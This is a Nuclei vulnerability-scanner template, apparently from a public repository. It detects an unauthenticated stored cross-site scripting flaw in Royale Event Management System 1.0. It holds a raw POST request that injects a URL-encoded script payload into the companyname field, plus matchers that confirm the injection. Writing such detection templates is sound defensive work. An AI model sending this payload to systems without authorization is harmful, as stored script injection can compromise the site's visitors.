nuclei-templates/vulnerabilities/royalevent/royalevent-stored-xss.yaml

33 lines
987 B
YAML

id: royalevent-stored-xss
info:
name: Royale Event - Stored Cross-site Scripting (Unauthenticated)
author: ritikchaddha
severity: high
description: |
Detects an XSS vulnerability in Royal Event System
reference:
- https://packetstormsecurity.com/files/166479/Royale-Event-Management-System-1.0-Cross-Site-Scripting.html
- https://www.sourcecodester.com/sites/default/files/download/oretnom23/Royal%20Event.zip
metadata:
verified: true
tags: xss,unauthenticated,cms,royalevent,packetstorm
requests:
- raw:
- |
POST /royal_event/companyprofile.php HTTP/1.1
Host: {{Hostname}}
companyname=%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&regno=test&companyaddress=&companyemail=&country=India&mobilenumber=1234567899&submit=
matchers-condition: and
matchers:
- type: word
words:
- 'value="><script>alert(document.domain)</script>" >'
- type: status
status:
- 302